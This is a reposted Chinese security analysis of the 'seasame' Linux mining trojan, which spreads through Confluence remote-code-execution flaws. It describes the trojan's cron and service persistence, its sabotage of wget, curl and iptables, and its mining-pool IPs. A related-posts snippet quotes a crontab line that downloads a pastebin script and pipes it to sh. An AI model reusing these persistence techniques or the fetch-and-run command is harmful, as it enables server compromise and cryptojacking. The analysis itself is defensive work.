linux 保活 脚本,利用Confluence最新漏洞传播的Linux挖矿病毒seasame

最新推荐文章于 2023-03-25 17:52:42 发布
最新推荐文章于 2023-03-25 17:52:42 发布
阅读量574 收藏
点赞数
文章标签: linux 保活 脚本

一、现象描述

近日,深信服EDR产品率先检测到一款新型Linux挖矿木马,经深信服安全专家分析,该病毒利用Confluence漏洞传播,通过定时下载对病毒体进行保活,同时由于病毒会杀掉包含“https://”、“http://”的进程,将导致用户无法下载文件及访问网页,挖矿进程会导致服务器出现卡顿等异常现象。深信服安全团队对该挖矿木马进行了详细的技术分析,并根据其母体文件名将其命名为seasame。

感染该木马后现象如下,可以看到一个CPU占用异常高的vmlinuz进程以及3个采用7位随机字符拼凑的进程。

2a5aa7f5eb973b1461d3d6cfba9c2d3f.png

另外,还会出现无法使用wget和curl命令,以及无法打开浏览器等问题。

cf9fb8408a4d6b2392e54223c965084f.png

该病毒目前的传播途径主要是利用Confluence近期公布的远程代码执行漏洞CVE-2019-3396和CVE-2019-3398,这里提醒有安装该软件的用户需要注意进行防御。

二、详细分析

2.1 母体脚本

一些初始化变量如下,其中entropy为C&C服务器字符串的翻转,C&C服务器地址为51[.]15[.]56[.]161[:]443;变量new_bash、new_dog、new_killbot、omelette为后面要创建的文件名,均由7位随机的字符串组成,后面描述这些文件时都直接使用其对应的变量名;_b,_j等变量用于拼凑shell命令。

facfb3013b27edb7e1bab82ee62051b3.png

根据是否存在vmlinuz进程及其CPU占用是否超过30%,判断系统是否已经感染,如果已经感染则杀掉其他CPU占用高于30%的进程并退出脚本:

d7379e33aeaf94a6f7a37789fc0fffcb.png

下载挖矿程序omelette及母体脚本seasame到/tmp目录下,并执行挖矿程序。

b107ca5ce0e376848362b36925229f9e.png

创建crontab定时任务:

da953089e214c161b003e015bdc1ed16.png

创建的定时任务如下,每隔5分钟都会从C&C服务器下载母体脚本seasame到/tmp目录下并执行:

014e96d46237156735bd2ea74a140547.png

删除iptables命令,将wget重命名为wgetak,curl命令重命名为curlak。

77ffac0675463b71a036e1d7c3660344.png

创建cloud_agent.service服务:

645d53d81e2f8a42991eebe3ad68b22b.png

cloud_agent.service服务如下,同样用于下载并执行母体脚本seasame:

3665b28846fd0b4feddd63528803e684.png

将bash命令复制到当前目录,然后分别执行3个脚本。new_dog:守护挖矿进程;new_killbot:清除除vmlinuz以外,CPU占用大于30%的进程;prot:杀掉包含“https://”、“http://”、“eval”的进程。

1d9e4b8ab84c61dbcdd582994d9ef603.png

2.2 挖矿程序

1.打开相应的文件,如果文件不存在,则生成相应的文件,如下所示:

0cd1d25e755b5e8f9a89acc09afd9c50.png

2.生成/temp/ec2a6文件,如下所示:

51f0a9fd356745a842970539c7bdce1f.png

生成的文件,如下所示:

92dd4da66825188976c37bc2bb784ffb.png

3.生成/var/tmp/f41,如下所示:

e7aeb0887ef35a1d4fbaaaa841369f4b.png

4.生成de33f4f911f20761,如下所示:

7449a06d18a6b2914835e821bd112350.png

生成的文件,如下所示:

b071afa01353901217f5f4a20825218e.png

5.获取主机CPU信息,如下所示:

f020d28b966ea5bffc22aa7473b07229.png

6.解密出相应的矿池IP地址:51.38.133.232、51.15.56.161,如下所示:

a466b5ac0840e790cfee11340c2bfbca.png

7.然后拼接不同的端口号,组成相应的矿池地址,如下所示:

a83253241c4790ed9ba30a947aff13f4.png

组合成的矿池地址列表,如下所示:51.38.133.232:443

51.15.56.161:80

51.38.133.232:21

51.15.56.161:20

51.38.133.232:53

51.15.56.161:53

51.38.133.232:162

51.15.56.161:161

51.38.133.232:990

51.15.56.161:989

51.38.133.232:1111

51.15.56.161:1111

51.38.133.232:2222

51.15.56.161:2222

51.38.133.232:3333

51.15.56.161:3333

51.38.133.232:4444

51.15.56.161:4444

51.38.133.232:8181

51.15.56.161:8080

51.38.133.232:25200

51.15.56.161:25400

8.创建子进程,进行挖矿操作,如下所示:

fe8834116b6ce3dc3668631a55e62e94.png

创建挖矿进程过程,如下所示:

80722561f49462331ac899ba2b9c5dfc.png

相应的进程信息,如下所示:

fbdd56b10f1713315bec70a4ce6f693f.png

top进程信息,如下所示:

b9cc59a29ffab8eafd0b029f13bc279a.png

9.挖矿进程相关参数,如下所示:

dc4c490bff69caa01c8bf10a43e91a7c.png

捕获到的相应的流量数据包,如下所示:

543968683919fb9e06b15326f4f99091.png

挖矿相关流量数据包,如下所示:

ac09b9375635d130ccf3a9db8e107e58.png

矿池IP地址为矿池地址列表中的:51.38.133.232:443

10.连接远程矿池地址,如下所示:

fa003859595a7e10065996d259ffeb94.png

请求连接51.15.56.161,如下所示:

a6b6da11fb31f525cc37052fa59433c8.png

获取到的流量数据,如下所示:

438583d7d3be50fd5debbc6e3067d6aa.png

如果连接失败,则请求连接51.38.133.232,如下所示:

a028bfe9daac5f8337477e69a3597ffc.png

返回相应的数据,如下所示:

2eef40b2ce8078f643d5dbb55bcd8853.png

获取到的流量数据,如下所示:

aa8cadb9034732ffadd0c9f4ea2c69a2.png

拼接相应的内容,如下所示:

46d73357674db2359031d07472bc1700.png

然后将获取的内容,写入到/temp/yayscript.sh脚本中,并通过bash执行sh脚本,如下所示:

6f29aa309291a6a9422b847685b7969f.png

yayscript.sh的内容,如下所示:

245667779815e863e3f93b4f0fe30f15.png

三、解决方案

病毒检测查杀

1、深信服为广大用户免费提供针对seasame病毒的专杀工具,可下载如下工具,进行检测查杀。

55ee43a4ceee70991ffd3a2d08ddc99d.png

*本文作者:深信服千里目安全实验室,转载请注明来自FreeBuf.COM

linkancheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
挖矿病毒检测脚本
Neko的博客
03-19 1182
#!/bin/bash #需要root权限 echo "Linux安全检查与应急响应工具" echo "Version:1.3" echo "Author:Daily" echo "Date:2020-11-11" dos2unix buying.sh date=$(date +%Y%m%d-%H%M%S) ipadd=$(ifconfig -a | grep -w inet | grep -v 127.0.0.1 | awk 'NR==1{print $2}') check_file="/tmp/
companion-linux:适用于 Linux 的非官方 Atlassian Confluence Companion App
05-31
适用于 LinuxConfluence Companion 应用程序 适用于 Linux 的 Companion App 是 (最初仅适用于 Windows 和 MacOS)的非官方端口,用于在 Linux 客户端上使用。 它基本上只是一个很小的python脚本(〜400行)。 ...
Linux平台 进程 监控 自动重启 恢复脚本, java, springboot 通过
10-29
Linux平台 下 进程监控自动 重启 恢复脚本, 测试 centos平台下 java, springboot 通过
linux 保活 脚本,TCP/IP学习笔记(13)-TCP坚持定时器,TCP保活定时器
weixin_39619433的博客
05-04 148
导读TCP一共有四个主要的定时器,前面已经讲到了一个--超时定时器--是TCP里面最复杂的一个,另外的三个是:1. 坚持定时器2. 保活定时器3. 2MSL定时器其中坚持定时器用于防止通告窗口为0以后双方互相等待死锁的情况;而保活定时器则用于处理半开放连接坚持定时器坚持定时器的原理是简单的,当TCP服务器收到了客户端的0滑动窗口报文的时候,就启动一个定时器来计时,并在定时器溢出的时候向向客户端查询...
Linux系统服务保活
weixin_45444325的博客
02-09 2123
系统服务保活 最近在研究linux系统的整机快速备份与恢复,已经确定文件可以完整备份并恢复成功,但一些服务是否可以正常运行还不能确定,所以有了下面的尝试 首先写了一个系统运行所依赖的服务的保活脚本 在系统服务中新增一个服务,用来保持此脚本的运行 Shell脚本 文件名: swp-service-stay-active.sh 文件存放位置: /root/ # ! /bin/sh export LANG="en_US.UTF-8" SERVICE_NAMES=(mysqld.service nginx.se
Linux守护进程
长期更新自学笔记
01-04 1842
守护进程: 后台执行,运行周期长,无需和用户交互
Confluence 批量导出doc的shell脚本
02-27
Confluence 批量导出doc的shell脚本,方便快捷,不用再自己去粘贴复制文档!
Windows Server平台 confluence6.7.1安装资料
07-21
在本篇中,我们将深入探讨如何在Windows Server平台上安装Confluence 6.7.1,这是一个流行的团队协作和知识管理软件。...持续学习和了解Confluence最新功能和最佳实践,将有助于您充分利用这个强大的协作平台。
docker-compose-linux
最新发布
11-02
docker-compose-linux,包含以下 activemq,baidupcs-web,canal,confluence,couchbase,efk,elasticsearch,elk,elkf,fastdfs,filebeat,flowable,gitlab,gogs,grafana,grafana-promtail-loki-nginx-demo,grafana_...
wiki confluence 安装包
12-14
9. **持续升级与维护**:定期检查Atlassian的更新,保持Confluence版本最新,以获取最新的功能和安全补丁。 在实际操作中,可能会遇到依赖问题、权限问题或其他技术挑战,但只要遵循官方文档和社区资源,这些问题都...
Java实现Linux下双守护进程
09-04
主要介绍了Java实现Linux下双守护进程的思路、原理以及具体实现方式,非常的详细,希望对大家有所帮助
服务器上redis保活的一个脚本
这天有点热的博客
07-13 751
#!/bin/bash #检查8080端口是否被占用,如果占用输出1,如果没有被占用输入0 pIDa=`/usr/sbin/lsof -i :6379|grep -v "PID" | awk '{print $2}'` pIDa1=`/usr/sbin/lsof -i :6380|grep -v "PID1" | awk '{print $2}'` pIDa2=`/usr/sbin/lsof -...
linux——挖矿程序处理
sunfragrence的博客
12-12 3619
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。 无论kill -9还是直接把系统中nanoWatch所对应的进程文件删除,一样会定时重启。 使用crontab -e查看当前系统的定时任务信息,如下: 显示定时从链接中下载文件,于是在浏览器中访问该地址,下载的文件截图如下: 很明显,这是一个恶意脚本,定时检查...
利用 Confluence 漏洞挖矿木马
Nikkis的博客
02-08 501
利用 Confluence 漏洞挖矿木马
查找linux内核漏洞查用的方法脚本
m0_62207170的博客
03-25 2234
查找linux内核漏洞查用的方法脚本
kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://p
weixin_33968104的博客
05-21 602
一. 症状及表现CPU使用率异常高,外出流量异常crontab异常,存在如下定时任务(基本上就可以确定了)[root@mdw ~]# crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh12在...
Nmap使用NSE进行漏洞扫描
weixin_41478914的博客
03-06 3513
转载自https://www.4hou.com/technology/10481.html 导语:Nmap本身内置有丰富的NSE脚本,可以非常方便的利用起来,当然也可以使用定制化的脚本完成个人的需求。本文将讲述如何利用Nmap的Scripts检测CVE漏洞。 演示两个NSE脚本,nmap-vulners和vulscan。这两种脚本的设计都是为了增强Nmap的版本检测,为特定服务(如SSH,RD...
挖矿病毒audiodg.exe\taskhost.exe溯源与手动查杀方法
weixin_61738543的博客
04-15 8997
前言 首先大家会打开到这篇文章,就已经说明你大概率已经被病毒所困扰了。自从byrut网站为大家提供了大部分不安全的盗版游戏资源,很多人都从这些资源中被病毒感染,并且难以靠普通的杀毒软件进行杀毒了。其中一个最让人最难受的资源,就是这个类似病毒工厂会自动生成木马一样的病毒。如果你想靠自己处理掉这些木马文件,或许我的文章所分享的经验可以帮助到你! 我并非专业查杀病毒的人员,只是一个普通的本科开发实习生,以下内容是为了简单的分享一下这类病毒的手动清理方式,还有分享发现这一病毒后的思考,以及溯源的方式与思路。
云服务器Linux挖矿病毒杀毒软件clamscan安装
TinkerBell的学习笔记
09-20 1783
云服务器Linux挖矿病毒杀毒软件Clamscan安装
linux confluence
08-24
Linux Confluence 是一种在 Linux 操作系统上运行的协同工具,用于团队协作和文档管理。要在 Linux 上安装 Confluence,你可以按照以下步骤进行操作: 1. 修改环境变量:使用命令 `vim /opt/atlassian/confluence/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值